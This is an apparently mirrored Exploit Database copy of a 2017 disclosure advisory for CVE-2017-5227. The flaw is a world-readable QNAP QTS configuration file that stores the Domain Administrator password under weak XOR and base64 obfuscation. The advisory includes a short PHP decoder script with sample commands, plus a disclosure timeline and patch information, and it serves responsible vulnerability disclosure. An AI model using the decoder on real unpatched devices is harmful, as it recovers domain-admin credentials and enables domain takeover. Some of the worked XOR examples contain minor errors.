QNAP QTS < 4.2.4 - Domain Privilege Escalation

• Exploit Database
• 19 阅读

• 作者： Pasquale Fiorillo
  日期： 2017-03-27
• 类别：

  • local
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/41745/

• QNAP QTS Domain Privilege Escalation Vulnerability
  
   NameSensitive Data Exposure in QNAP QTS
   Systems AffectedQNAP QTS (NAS) all model and all versions < 4.2.4
   SeverityHigh 7.9/10
   ImpactCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
   Vendorhttp://www.qnap.com/
   Advisoryhttp://www.ush.it/team/ush/hack-qnap/qnap.txt
   Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) 
   Guido "go" Oricchio (g.oricchio AT pcego DOT com)
   Date20170322
  
  I. BACKGROUND
  
  QNAP Systems, founded in 2004, provides network attached storage (NAS)
  and network video recorder (NVR) solutions for home and business use to
  the global market.
  QNAP also delivers a cloud service, called myQNAPcloud, that allows
  users to access and manage the devices from anywhere.
  QTS is a QNAP devices proprietary firmware based on Linux.
  
  ISGroup (http://www.isgroup.biz/) is an Italian Information Security 
  boutique, we found this 0day issue while supporting Guido Oricchio 
  of PCego, a System Integrator, to secure a QNAP product for one of his
  customer.
  
  Responsible disclosure with Qnap: we contacted qnap on public security@
  contact and we escalate fast to their Security Researcher Myron Su on
  PGP emails.
  
  Prior vulnerabilities in QNAP: 
  https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
  
  Information to customers of the vulnerability is shown in their bulletin
  ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
  QTS 4.2.4 Build 20170313 includes security fixes for the following
  vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
  reported by Pasquale Fiorillo of the cyber security company ISGroup
  (www.isgroup.biz), a cyber security company, and Guido Oricchio of
  PCego (www.pcego.com), a system integrator.
  
  The latest version of the software at the time of writing can be 
  obtained from:
  
  https://www.qnap.com/en-us/product_x_down/
  https://start.qnap.com/en/index.php
  https://www.qnap.com/
  
  II. DESCRIPTION
  
  The vulnerability allows a local QTS admin user, or other low privileged
  user, to access configuration file that includes a bad crypted Microsoft
  Domain Administrator password if the NAS was joined to a Microsoft 
  Active Directory domain.
  
  The affected component is the "uLinux.conf" configuration file, 
  created with a world-readable permission used to store a Domain 
  Administrator password.
  
  Admin user can access the file using ssh that is enabled by default.
  Other users are not allowed to login, so they have to exploit a 
  component, such as a web application, to run arbitrary command or 
  arbitrary file read.
  
  TLDR: Anyone is able to read uLinux.conf file, world readable by 
  default, can escalate to Domain Administrator if a NAS is a domain 
  member.
  
  III. ANALYSIS
  
  QNAP QTS stores "uLinux.conf" configuration file in a directory 
  accessible by "nobody" and with permission that make them readable by 
  "nobody".
  
  If the NAS was joined to an Active Directory, such file contain a Domain
  Administrator user and password in an easily decrypt format.
  
  In older versions of QTS the Domain Admin's password was stored in
  plaintext.
  
  A) Config file readable by "nobody"
  
  [~] # ls -l /etc/config/uLinux.conf 
  -rw-r--r--1 adminadminist7312 Dec 10 06:39 /etc/config/uLinux.conf
  
  Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, 
  TS-469L, and TS-221. Access to the needed file are guaranteed to 
  all the local users, such as httpdusr used to running web sites and 
  web application hosted on the NAS.
  
  This expose all the information contained in the configuration file at
  risk and this is a violation of the principle of least privilege.
  
  https://en.wikipedia.org/wiki/Principle_of_least_privilege
  
  B) Weak encrypted password in the configuration file
  
  The Microsoft Active Directory Admin username and password are stored 
  in the file obfuscated by a simple XOR cypher and base64 encoded.
  
  In this scenario, a Local File Read vulnerability could lead to full
  domain compromise given the fact that an attacker can re-use such
  credentials to authenticate against a Domain Controller with maximum
  privileges.
  
  The password field in the uLinux.conf has the following format:
  
  User = <username>
  Password = <base64>
  
  eg: 
  User = Administrator
  Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
  
  The "<base64>" decoded is:
  
  sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
  0000000003 03 00 00 01 01 06 0607 07 04 04 23 23 20 20|............##|
  0000001021 21 26 26 27 27 24 2443 |!!&&''$$C|
  00000019
  
  Each byte xored with \x62 is the hex ascii code of the plaintext char.
  Eg: 
  \x03 ^ \x62 = \x61 (a)
  \x00 ^ \x62 = \x61 (b)
  ...
  \x24 ^ \x62 = \x46 (F)
  \x43 ^ \x62 = \x21 (!)
  
  The plaintext password is: aabbccddeeffAABBCCDDEEFF!
  
  IV. EXPLOIT
  
  The following code can be used to decode the password:
  
  #!/usr/bin/php
  <?php
  $plaintext = str_split(base64_decode($argv[1]));
  foreach($plaintext as $chr) {
  	echo chr(ord($chr)^0x62);
  }
  echo "\n";
  
  Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
  aabbccddeeffAABBCCDDEEFF!
  
  V. VENDOR RESPONSE
  Vendor released QTS 4.2.4 Build 20170313 that contains the proper
  security patch. At the time of this writing an official patch is
  currently available.
  
  VI. CVE INFORMATION
  
  Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
  Qnap it's referred as Case NAS-201703-21.
  
  VII. DISCLOSURE TIMELINE
  
  20161212 Bug discovered
  20170106 Request for CVE to Mitre
  20170106 Disclosure to security@qnap.com
  20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
  20170107 Details disclosure to Myron Su
  20170109 Got CVE-CVE-2017-5227 from cve-assign
  20170110 Myron Su confirm the vulnerability
  20170203 We asks for updates, no release date from vendor
  20170215 We extend the disclosure date as 28 Feb will not be met
  20170321 QNAP releases the QTS 4.2.4 Build 20170313
  20170322 Advisory disclosed to the public
  
  VIII. REFERENCES
  
  [1] Top 10 2013-A6-Sensitive Data Exposure
  https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
  
  [2] Access Control Cheat Sheet
  https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
  
  [3] https://forum.qnap.com/viewtopic.php?t=68317
  20121213 User reporting that the password was stored in plaintext in
  a world-readable file
  
  [4] https://www.qnap.com/en/support/con_show.php?cid=113
  Qnap Security Bullettin NAS-201703-21 
  
  IX. CREDIT
  
  Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 
  discovery of this vulnerability.
  
  Pasquale "sid" Fiorillo
  web site: http://www.pasqualefiorillo.it/
  mail: sid AT ush DOT it
  
  Guido "go" Oricchio
  web site: http://www.pcego.com/
  mail: g.oricchio AT pcego DOT com
  
  X. LEGAL NOTICES
  
  Copyright (c) 2017 Pasquale "sid" Fiorillo
  
  Permission is granted for the redistribution of this alert
  electronically. It may not be edited in any way without mine express
  written consent. If you wish to reprint the whole or any
  part of this alert in any other medium other than electronically,
  please email me for permission.
  
  Disclaimer: The information in the advisory is believed to be accurate
  at the time of publishing based on currently available information. Use
  of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
  author nor the publisher accepts any liability for any direct, indirect,
  or consequential loss or damage arising from use of, or reliance on,
  this information.